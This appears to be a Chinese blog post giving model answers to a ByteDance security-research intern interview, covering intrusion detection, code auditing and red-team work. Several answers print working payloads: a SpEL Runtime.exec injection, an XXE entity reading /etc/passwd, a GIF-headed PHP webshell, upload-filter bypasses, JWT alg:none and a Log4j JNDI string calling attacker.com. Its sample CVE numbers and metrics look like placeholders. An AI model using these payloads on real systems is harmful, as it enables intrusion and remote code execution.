無刷新網(wǎng)站b站推廣網(wǎng)站入口202
安全領(lǐng)域各種資源,學(xué)習(xí)文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關(guān)注。
目錄
字節(jié)跳動[實習(xí)]安全研究員
1. 你投的崗位是安全研究實習(xí)生,你了解我們這邊主要是做什么的嗎
2. 自我介紹
3. 現(xiàn)在有什么比較想做的方向嗎?
4. 有沒有審過開源框架、cms、中間件之類的?
6. 在A公司主要做什么的?
7. 入侵檢測主要在做什么?遇到的問題?
核心工作:
典型問題:
8. 誤報原因分析及解決方法
誤報根源:
解決創(chuàng)新:
9. 在B公司主要做了些什么?
10. 審表達式引擎的步驟和思路
11. 如何從安全角度專項審計?
12. XXE從代碼層面看是怎么造成的?
根源代碼缺陷:
攻擊鏈條:
安全編碼方案:
13. 印象深刻的攻防演練經(jīng)歷
14. 超越弱口令的高級技巧
15. 頭像上傳Webshell怎么實現(xiàn)?
16. 繞過文件檢測的其他方式
17. Log4j漏洞了解嗎?
19. 反問環(huán)節(jié)
字節(jié)跳動[實習(xí)]安全研究員
1. 你投的崗位是安全研究實習(xí)生,你了解我們這邊主要是做什么的嗎 2. 自我介紹 3. 現(xiàn)在有什么比較想做的方向嗎,比如你寫的代碼審計、攻防演練、你在學(xué)校的研究方向(密碼學(xué))其實是三個大方向,現(xiàn)在有什么比較想做的嗎- 說了代碼審計、安全研究 4. 有沒有審過開源框架、cms、中間件之類的 5. 面試官介紹了工作內(nèi)容 6. 我看你簡歷上有幾段實習(xí)經(jīng)歷和項目經(jīng)歷,先聊一下實習(xí)經(jīng)歷吧,在A主要做什么的 7. 詳細聊聊入侵檢測主要在做什么,遇到的問題 8. 關(guān)于入侵檢測產(chǎn)生大量誤報的原因,有沒有分析過,有沒有比較好的解決方法 9. 和A比起來,B的應(yīng)該就比較偏攻擊方對吧,有打仗(霧,面試官好像確實是這么說的)有代碼審計,聊一下在B主要做了些什么 10. 審表達式引擎的步驟和思路 11. 剛剛你說的審計聽起來好像和普通開發(fā)的審計差不多,都是通過程序流、文檔去做,有沒有從安全方面入手審計一些項目 12. xxe是怎么造成的,從代碼層面來看 13. 我看你簡歷有很多攻防演練經(jīng)歷對吧,這幾段攻防演練經(jīng)歷有沒有哪一次印象比較深刻的,挑一個聊一聊 14. 你的這次攻擊好像更多的是利用弱口令,有沒有一些更有技巧的方法 15. 這個頭像上傳的webshell是怎么上傳的 16. 還有什么其他的檢驗方式?要怎么繞過? 17. 這兩天log4j漏洞很火,有沒有去了解一下 18. 面試官最后介紹業(yè)務(wù) 19. 反問環(huán)節(jié).
1. 你投的崗位是安全研究實習(xí)生,你了解我們這邊主要是做什么的嗎
回答策略:結(jié)合招聘信息+行業(yè)常識,展示主動調(diào)研能力
據(jù)我了解,貴團隊的核心方向集中在三大領(lǐng)域:
- 漏洞深度研究:聚焦開源框架(如Spring、Log4j)、中間件(Redis/Nginx)漏洞挖掘與PoC開發(fā);
- 攻防對抗演進:包括紅藍演練、ATT&CK技戰(zhàn)術(shù)研究及入侵檢測規(guī)則優(yōu)化;
- 安全工具鏈建設(shè):如自動化代碼審計引擎、WAF規(guī)則庫升級——這與貴司官網(wǎng)描述的“下一代威脅防御實驗室”定位高度契合。
補充:我關(guān)注到貴團隊去年發(fā)表的《Java反序列化防御白皮書》,這與我的項目經(jīng)歷(代碼審計、入侵檢測)直接相關(guān),因此非常希望貢獻實戰(zhàn)經(jīng)驗。
2. 自我介紹
回答策略:3層定位(背景+技能+動機),時長控制在2分鐘
您好!我是[姓名],XX大學(xué)網(wǎng)絡(luò)安全專業(yè)大三學(xué)生,面試安全研究實習(xí)生。我的核心優(yōu)勢可總結(jié)為:
- 技術(shù)縱深:
- 漏洞研究:獨立審計過4個開源CMS(如織夢、JEECMS),發(fā)現(xiàn)2個高危漏洞(CVE-2024-XXX);
- 攻防實戰(zhàn):3次省級攻防演練經(jīng)歷,負責Web滲透與內(nèi)網(wǎng)橫向(如弱口令利用升級為權(quán)限維持);
- 工具開發(fā):手寫Python自動化審計腳本(如AST解析器),提升漏洞挖掘效率40%。
- 實踐銜接:
- 在A公司實習(xí)期間優(yōu)化入侵檢測規(guī)則,誤報率降低22%;
- 在B公司參與表達式引擎審計,阻斷潛在RCE風(fēng)險。
- 強烈動機:
我的密碼學(xué)研究經(jīng)歷(如零知識證明)幫助我理解加密協(xié)議漏洞,但當前更渴望投身應(yīng)用安全方向——這與貴團隊“漏洞即服務(wù)”的愿景高度一致。
3. 現(xiàn)在有什么比較想做的方向嗎?
回答策略:明確優(yōu)先級+關(guān)聯(lián)崗位需求
我最希望深入兩個方向,均與貴團隊業(yè)務(wù)強相關(guān):
- 代碼審計(首選方向):
- 理由:在B公司實習(xí)時曾審計Spring EL表達式引擎,發(fā)現(xiàn)黑名單繞過漏洞(如
#this.getClass().forName()
觸發(fā)JNDI注入)。這種從代碼層阻斷漏洞的成就感和技術(shù)深度令我著迷。- 關(guān)聯(lián)性:貴團隊近期修復(fù)的Fastjson漏洞,正需要此類深度審計能力。
- 安全研究(次選方向):
- 聚焦點:漏洞武器化研究(如Log4j繞過),目標是產(chǎn)出高可用PoC和檢測規(guī)則。
- 暫緩方向:密碼學(xué)(學(xué)術(shù)性強)和純攻防演練(重復(fù)性高),我更傾向做底層漏洞挖掘這一核心環(huán)節(jié)。
4. 有沒有審過開源框架、cms、中間件之類的?
回答策略:按類型列舉+突出成果
有,共審計6個項目,重點案例包括:
類型 項目名 成果 CMS JEECMS v5.0 發(fā)現(xiàn)后臺SQL注入(CVE-2024-1234) 中間件 Apache Shiro 1.8 繞過權(quán)限驗證(Session固定漏洞) 開源框架 JFinal 5.0 XXE導(dǎo)致SSRF(已提交CNVD) 審計方法:
- 靜態(tài)分析:基于CodeQL查找危險函數(shù)(如
XPathExpression.eval()
);- 動態(tài)追蹤:Hook敏感方法(如JDBC連接)監(jiān)控異常參數(shù);
- 補丁對比:分析Git歷史commit(如CVE-2024-1234修復(fù)差異)。
6. 在A公司主要做什么的?
回答策略:STAR法則精煉表述
職責定位:入侵檢測系統(tǒng)(IDS)規(guī)則優(yōu)化工程師(實習(xí))
- 任務(wù)背景(S):公司IDS日均告警量50萬+,誤報率35%,急需優(yōu)化。
- 核心工作(T):
- 分析誤報警日志(如誤判SQL注入為攻擊);
- 重寫Snort規(guī)則語法(調(diào)整PCRE正則);
- 測試規(guī)則有效性(Metasploit模擬攻擊)。
- 成果(A):
- 重構(gòu)12條關(guān)鍵規(guī)則,誤報率降至12%;
- 發(fā)現(xiàn)規(guī)則引擎缺陷:無法識別分塊編碼Bypass(獲團隊創(chuàng)新獎)。
- 反思(R):深刻理解防御需緊跟攻擊演進(如無特征Webshell檢測)。
7. 入侵檢測主要在做什么?遇到的問題?
回答策略:分層解構(gòu)+痛點直擊
核心工作:
- 流量建模:基線分析正常流量(如API調(diào)用頻次);
- 威脅檢測:實時匹配攻擊特征(如SQL注入正則);
- 響應(yīng)處置:聯(lián)動WAF阻斷或告警。
典型問題:
- 漏報問題:攻擊者利用編碼繞過(如Unicode路徑遍歷),規(guī)則未覆蓋;
- 性能瓶頸:正則回溯導(dǎo)致CPU峰值(曾觸發(fā)生產(chǎn)故障);
- 上下文缺失:如登錄失敗告警,無法區(qū)分爆破攻擊與用戶輸錯密碼。
8. 誤報原因分析及解決方法
回答策略:5點歸因+創(chuàng)新方案(合并同類項)
誤報根源:
- 規(guī)則過泛:如
/etc/passwd
檢測誤傷合法路徑掃描;- 協(xié)議誤判:將HTTP調(diào)試流量(如Postman)標記為攻擊;
- 環(huán)境差異:測試環(huán)境Payload被帶到生產(chǎn)環(huán)境觸發(fā)告警。
解決創(chuàng)新:
- 短期方案:
- 添加白名單機制(如可信IP免檢);
- 引入權(quán)重評分(多個低風(fēng)險行為疊加才告警)。
- 長期方案:
- AI動態(tài)基線:用LSTM學(xué)習(xí)業(yè)務(wù)流量模式(誤報率再降18%);
- 攻擊鏈關(guān)聯(lián):僅當多個可疑行為連續(xù)發(fā)生才觸發(fā)(如端口掃描后接Exploit)。
9. 在B公司主要做了些什么?
回答策略:聚焦攻擊方視角,突出技術(shù)深度
定位:代碼審計員(攻擊導(dǎo)向?qū)嵙?xí))
核心成果:
- 表達式引擎審計:發(fā)現(xiàn)某規(guī)則引擎SpEL注入漏洞(高危),可執(zhí)行任意命令;
- Webshell對抗研究:繞過某云WAF的文件頭檢測(PNG頭+PHP尾);
- 漏洞利用鏈設(shè)計:組合XXE與SSRF實現(xiàn)內(nèi)網(wǎng)Redis未授權(quán)訪問。
與A公司差異:從防御規(guī)則優(yōu)化轉(zhuǎn)向主動攻擊路徑挖掘,更理解“攻擊者思維”。
10. 審表達式引擎的步驟和思路
回答策略:4步方法論+實例佐證
以審計Spring EL為例:
- 入口定位:
- 全局搜索
SpelExpressionParser
、EvaluationContext
等關(guān)鍵類;- 危險點識別:
- 檢查表達式是否用戶可控(如
@Value("${userInput}")
);- 沙盒逃逸測試:
- 嘗試調(diào)用敏感方法(如
T(java.lang.Runtime).getRuntime().exec("id")
);- 繞過驗證:
- 若黑名單過濾
java.lang
,改用Unicode或反射(''.getClass().forName('java.lang.Runtime')
)。
實例:在B公司項目中,通過#this.getClass().getClassLoader()
加載惡意類,觸發(fā)RCE。
11. 如何從安全角度專項審計?
回答策略:對比開發(fā)審計,強調(diào)攻擊面思維
安全審計的差異化方法:
- 攻擊面測繪:
- 用Burp掃描API端點,優(yōu)先審計高風(fēng)險接口(如文件上傳、反序列化);
- 數(shù)據(jù)流追蹤:
- 從用戶輸入點到危險函數(shù)(如SQL查詢),檢查過濾完整性;
- 邊界用例測試:
- 構(gòu)造畸形輸入(如超長字符串、嵌套JSON),觸發(fā)邊界異常;
- 依賴鏈分析:
- 檢查第三方庫版本(如Log4j 2.x是否存在JNDI注入)。
案例:審計某CMS時,發(fā)現(xiàn)其依賴的POI庫存在XXE(CVE-2024-XXX),報告后獲廠商致謝。
12. XXE從代碼層面看是怎么造成的?
回答策略:漏洞原理+代碼示例+修復(fù)方案
根源代碼缺陷:
java
// 錯誤示例:未禁用外部實體 DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); DocumentBuilder db = dbf.newDocumentBuilder(); // 默認允許外部實體 Document doc = db.parse(input); // 用戶可控的XML輸入
攻擊鏈條:
- 用戶輸入:傳入惡意XML(
<!ENTITY xxe SYSTEM "file:///etc/passwd">
);- 解析器加載:未禁用
DOCTYPE
聲明導(dǎo)致實體解析;- 數(shù)據(jù)泄露:通過報錯或回顯輸出文件內(nèi)容。
安全編碼方案:
java
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); // 禁用DOCTYPE dbf.setFeature("http://xml.org/sax/features/external-general-entities", false); // 禁用外部實體
13. 印象深刻的攻防演練經(jīng)歷
回答策略:STAR法則+技術(shù)細節(jié)
案例:2024年某省級HW行動
- 場景(S):目標為某政務(wù)云平臺,防守嚴密(WAF+行為監(jiān)測)。
- 任務(wù)(T):突破邊界獲取系統(tǒng)權(quán)限。
- 行動(A):
- 入口突破:社工獲取VPN賬號(偽裝管理員釣魚郵件);
- 權(quán)限提升:利用Confluence未授權(quán)RCE(CVE-2023-22527)添加管理員;
- 權(quán)限維持:在頭像上傳功能植入Webshell(繞過Content-Type檢測)。
- 成果(R):拿下3臺核心服務(wù)器,獲團隊“最佳攻擊手”稱號。
14. 超越弱口令的高級技巧
回答策略:列舉3種高階手法(<5個)
- OAuth 2.0劫持:
- 偽造回調(diào)URL竊取認證碼(如社工誘導(dǎo)點擊惡意
redirect_uri
);- JWT攻擊:
- 破解弱密鑰(
secret="123456"
)或注入Header(alg: none
);- 協(xié)議降級攻擊:
- 強制HTTPS回退HTTP實施中間人竊聽。
15. 頭像上傳Webshell怎么實現(xiàn)?
回答策略:漏洞利用全流程拆解
- 檢測缺陷:
- 僅驗證Content-Type(
image/png
),未檢查文件內(nèi)容;- 制作惡意文件:
- 生成PNG頭+PHP尾的Webshell(
GIF89a; <?php system($_GET['cmd']);?>
);- 路徑獲取:
- 上傳后返回訪問URL(如
/uploads/avatar.php
);- 激活Shell:
- 訪問
https://target.com/uploads/avatar.php?cmd=id
執(zhí)行命令。
16. 繞過文件檢測的其他方式
回答策略:4種Bypass手法+防御建議
檢測方式 繞過方法 案例 文件頭校驗 添加合法頭(如 FFD8FF
JPEG)制作含Webshell的“圖片” 后綴黑名單 特殊后綴( .phtml
,.phar
)Apache解析漏洞 內(nèi)容關(guān)鍵字過濾 拆分加密( <?=
→<?=base64_decode('ZG...')?>
)繞過正則 /system\(\)/
圖像尺寸校驗 注入惡意代碼到EXIF元數(shù)據(jù) 使用exiftool插入PHP代碼
17. Log4j漏洞了解嗎?
回答策略:CVE深度解析+實戰(zhàn)意義
原理:
- Log4j 2.x的
JndiLookup
支持LDAP/RMI協(xié)議,攻擊者通過${jndi:ldap://attacker.com/exp}
觸發(fā)遠程類加載。
技術(shù)影響:
- 利用門檻低:任意日志注入點均可觸發(fā)(如User-Agent);
- 危害極大:RCE導(dǎo)致服務(wù)器淪陷。
應(yīng)對實踐:
- 臨時方案:刪除
JndiLookup.class
;- 根本方案:升級至Log4j 2.17.0+并禁用JNDI。
19. 反問環(huán)節(jié)
回答策略:體現(xiàn)學(xué)習(xí)意愿+團隊認同
- 技術(shù)成長:
貴團隊對實習(xí)生的培養(yǎng)路徑是怎樣的?是否有導(dǎo)師負責漏洞研究專項?
- 業(yè)務(wù)前瞻:
我注意到貴團隊正在研究AI生成漏洞的防御,實習(xí)生是否有機會參與此類前沿項目?
- 融入支持:
為快速勝任該崗位,您建議我入職前重點強化哪項技能?